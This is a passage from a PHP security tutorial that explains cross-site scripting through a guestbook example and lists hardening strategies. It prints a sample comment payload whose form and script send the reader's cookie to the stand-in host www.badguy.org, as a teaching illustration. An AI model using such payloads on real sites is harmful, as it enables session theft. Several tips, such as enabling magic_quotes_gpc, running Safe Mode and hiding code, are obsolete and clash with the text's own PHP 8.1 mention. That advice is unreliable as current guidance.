This is strictly speaking not a PHP security problem, but it is a common one. Imagine the following situation: You use a web application on your site, say a guestbook, that lets your users leave a comment. Before the comment is published, it is saved in a database. When you log into the application, you get to vet the comment. You can then edit it, delete it, or approve it, by submitting the comment back to the application. Because it's all just going into an HTML page, your users are allowed to write what they want, and you have taken care of backslash-escaping all data before it goes into the database. So this should be safe, right? Well, not necessarily.

When the comment is written into the HTML page, it is interpreted as HTML. That is great if you want your users to be able to include bold or italic text, paragraphs, lists, or tables. However, it also lets them include forms and JavaScript, and this is where life becomes dangerous.

Assume for a moment that your comment is printed out like this:

<!-- other HTML of the page goes here ... -->
<?php
// print out user comment
echo $userComment;
?>
<!-- ... and here -->

Now assume that a malicious user enters this as a comment:

I really like your page, ha, ha
<form name=spyform action=www.badguy.org method=post>
<input type=hidden name=cookieval>
</form>
<script>
document.spyform.cookieval.value = document.cookie;
document.spyform.submit();
</script>
      

This displays as "I really like your page, ha, ha", but by the time you read this, your cookie (which presumably contains your session token and hence your login credentials for this session) is on its way to the guy who really likes your page. He can then log in as you (hijack your session), and perhaps use other functions of your site in order to deface it or get at confidential information.

Hold on a second - how could this happen? Well, the basic problem here is that we allowed the hacker to smuggle invisible HTML and JavaScript code into our browser, which made the browser commit an action that we didn't anticipate and that revealed information about us. Note that none of the above could have been prevented by backslash-escaping quotes!

Variants of this type of attack include reading other information on the page via the document object model (DOM), or modifying actions. For example, assume that the user comment in the above application is displayed inside a form field for editing/vetting. An attacker could then modify the above attack to terminate the textarea early by inserting a </textarea> tag, and to add an onsubmit event handler to the form. When you unsuspectingly approve the lot, the handler is called and replaces the nice text with a horrible insult - which you have then, seemingly, approved!

This sort of attack is easily prevented by using the htmlentities() function on every bit of user information that reaches the screen:

<!-- other HTML of the page goes here ... -->
<?php
// print out user comment
echo htmlentities($userComment);
// or echo htmlspecialchars($userComment,ENT_QUOTES);
?>
<!-- ... and here -->

htmlentities() converts characters into their equivalent HTML entity representation wherever possible. This causes the HTML code to be displayed rather than interpreted, and we can see immediately what our admirer is really up to.

Note that it's not sufficient to just get rid of the literal < and > and turn them into &lt; and &gt;. It's just as important to convert quotes. This is because your user data may at times be written into the values of HTML attributes, like so:

<!-- other HTML of the page goes here ... -->
<input type="text" name="comment" value="<?php echo $userComment; ?>">
<!-- ... and here -->
      

Even backslash-escaped quotes terminate the value string of an attribute, and an attacker can use this to add extra attributes, such as event handlers, which may be used for sinister purposes. For example, the attacker could redirect the submission of a form to a different script, or even write a form via DOM into the page. Both htmlentities() and htmlspecialchars() take care of HTML tags, ampersands, and quotes, provided that the ENT_QUOTES flag is set as the second parameter; without it, PHP versions before 8.1 leave single quotes untouched.
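
To see what the conversion does to an attribute value, consider the following sketch. The wrapper escape_html() and the sample comment are invented for this illustration, and the "UTF-8" argument assumes that your pages are served in that character set:

```php
<?php
// Hypothetical wrapper so that ENT_QUOTES is never forgotten.
function escape_html($text) {
    return htmlspecialchars($text, ENT_QUOTES, "UTF-8");
}

// A "comment" that tries to break out of the value attribute
$userComment = '" onmouseover="alert(1)';

// The quotes arrive in the page as &quot; and can no longer end the attribute
$html = '<input type="text" name="comment" value="' . escape_html($userComment) . '">';
```

The browser still shows the original text in the input field, but it no longer treats the smuggled quotes as the end of the value.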

Another sore spot that you should watch out for is the writing of user-supplied data of any kind into URLs - ensure that this cannot have other values than the ones you explicitly want to allow!
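
For URLs, this could be sketched as follows. The script name index.php, the parameter name "section" and the list of permitted sections are assumptions made up for this illustration; http_build_query() is a standard PHP function that URL-encodes the values it is given:

```php
<?php
// Hypothetical helper: builds a link to one of the sections we actually offer.
function section_link($section) {
    $allowed = array("news", "prices", "contact"); // the only values we want to see
    if (!in_array($section, $allowed, true)) {
        $section = "news"; // fall back to a harmless default
    }
    return "index.php?" . http_build_query(array("section" => $section));
}

// Usage: $link = section_link(isset($_GET["section"]) ? $_GET["section"] : "");
```

Remember that the resulting link still needs to go through htmlentities() or htmlspecialchars() when you write it into an HTML attribute.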

Strategies that help you avoid security holes

To wrap it all up, let's have a look at a collection of strategies that let you avoid security problems. Some of them may be familiar to you, others may be new to you.

Keep your code under wraps!
If you have a look at our previous examples, you'll find that all our attacks have profited from the fact that we knew the code. If you're using "public" code (e.g., from script archives), you're running the risk that people are searching systematically for this code. If you publish your own code, you risk that potential hackers will have a good look at it in order to find your little sins and omissions. If you're using public third-party code, renaming the scripts might pay off. If you use your own code and keep it under wraps, potential intruders are left in the dark.
Filter all input data that originates from the browser
OK, that's something I've already recommended to you on several occasions. Just a reminder: The input data from the browser includes not only the data in the $_POST array, but also the data in $_GET and $_COOKIE, as well as some data in $_SERVER that is based on browser-supplied information. That includes, among other things, the browser machine's IP address and the URL that purportedly referred the browser to your script.
Restrict the use of external functions to the absolutely necessary minimum
This is also something that I have suggested to you before. For most day-to-day tasks, PHP has customized functions available, which are easily found in the PHP manual. The use of external functions for the same purpose can only carry additional risk.
Keep your software up to date
The web is still relatively young, and as a result it happens now and then that someone finds a vulnerability in an operating system, in a web server, in a scripting language such as PHP or in a database. As most of these programs are widespread, hackers often scan systematically for machines that run this software. Notifications about vulnerabilities and/or patches may be obtained via the mailing lists of the software developers, manufacturers or distributors or from CERT. Vulnerable software should be replaced as quickly as possible by a "watertight" version - remember that the bad guys scan by IP, so you don't need to run a high-profile site for them to find you.
Wherever possible, leave magic_quotes_gpc On and register_globals Off
Even if it seems to be more convenient the other way around, this is the best solution by far as it defuses in advance a lot of potential security problems that originate from code injection or specification of non-empty default values. We've also discussed this before. If you cannot influence the setting, ensure that a change in setting cannot break your code: Insert backslashes into all $_GET, $_POST, and $_COOKIE variables you use and initialize all variables to a defined value before first use.
Restrict the open_basedir
The open_basedir directive in php.ini determines which directories your scripts should be able to open files from. Restrict this to "." if you can, especially in a shared hosting environment. Note that there is one PHP command - chdir() - which is able to circumvent this restriction and should be disabled if at all possible.
Don't let your pages be cached by the browser if they contain confidential access information
If your users access your site from a "public" computer, e.g., from an Internet cafe or a university computer lab, a subsequent user of the machine may be able to fish the access information from the browser's cache memory. I quite like to use hidden forms and fields in my web pages, in order to keep the web server informed, across a series of pages (called a session), about which user it is dealing with on the browser side. In this case, though, I must ensure that the browser does not retain the access data in its memory any longer than is absolutely necessary - i.e., only while the page is actually displayed. In other words: I have to talk the browser out of wanting to cache the stuff. Look at the entry for the header() function in the PHP documentation to see how that is done.
Run PHP in Safe Mode
If you are able to configure your web server or at least PHP yourself, you should consider running PHP in Safe Mode. In particular on a platform with strict user separation, such as Unix, Linux or Win2K/XP, this helps you limit potential damage. Safe Mode only permits modifications of files owned by the user that also owns the executing script.
Encrypt data in transit between the web server and the browser with SSL certificates
This applies in particular if you want to handle financial or otherwise confidential transactions via your web site. For this, you'll probably need a server certificate, which you can obtain from your web hosting provider or from a certification company.
Use cryptic passwords
This is something that one shouldn't have to mention: passwords for web or database servers that can be found in a dictionary are - for all practical purposes - already cracked.
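
As an illustration of the caching strategy above, the following sketch shows header lines that are commonly used to talk the browser out of caching a page. The two function names are invented for this example, and the exact set of headers is an assumption, not a guarantee for every browser. The calls to header() must happen before the script sends any other output:

```php
<?php
// Hypothetical helper: the header lines we want to send with confidential pages.
function no_cache_headers() {
    return array(
        "Cache-Control: no-store, no-cache, must-revalidate",
        "Pragma: no-cache",                       // for older HTTP/1.0 clients
        "Expires: Sat, 26 Jul 1997 05:00:00 GMT", // a date in the past
    );
}

// Hypothetical helper: sends the lines above using PHP's header() function.
function send_no_cache_headers() {
    foreach (no_cache_headers() as $line) {
        header($line);
    }
}

// Usage: call send_no_cache_headers(); at the very top of each confidential page.
```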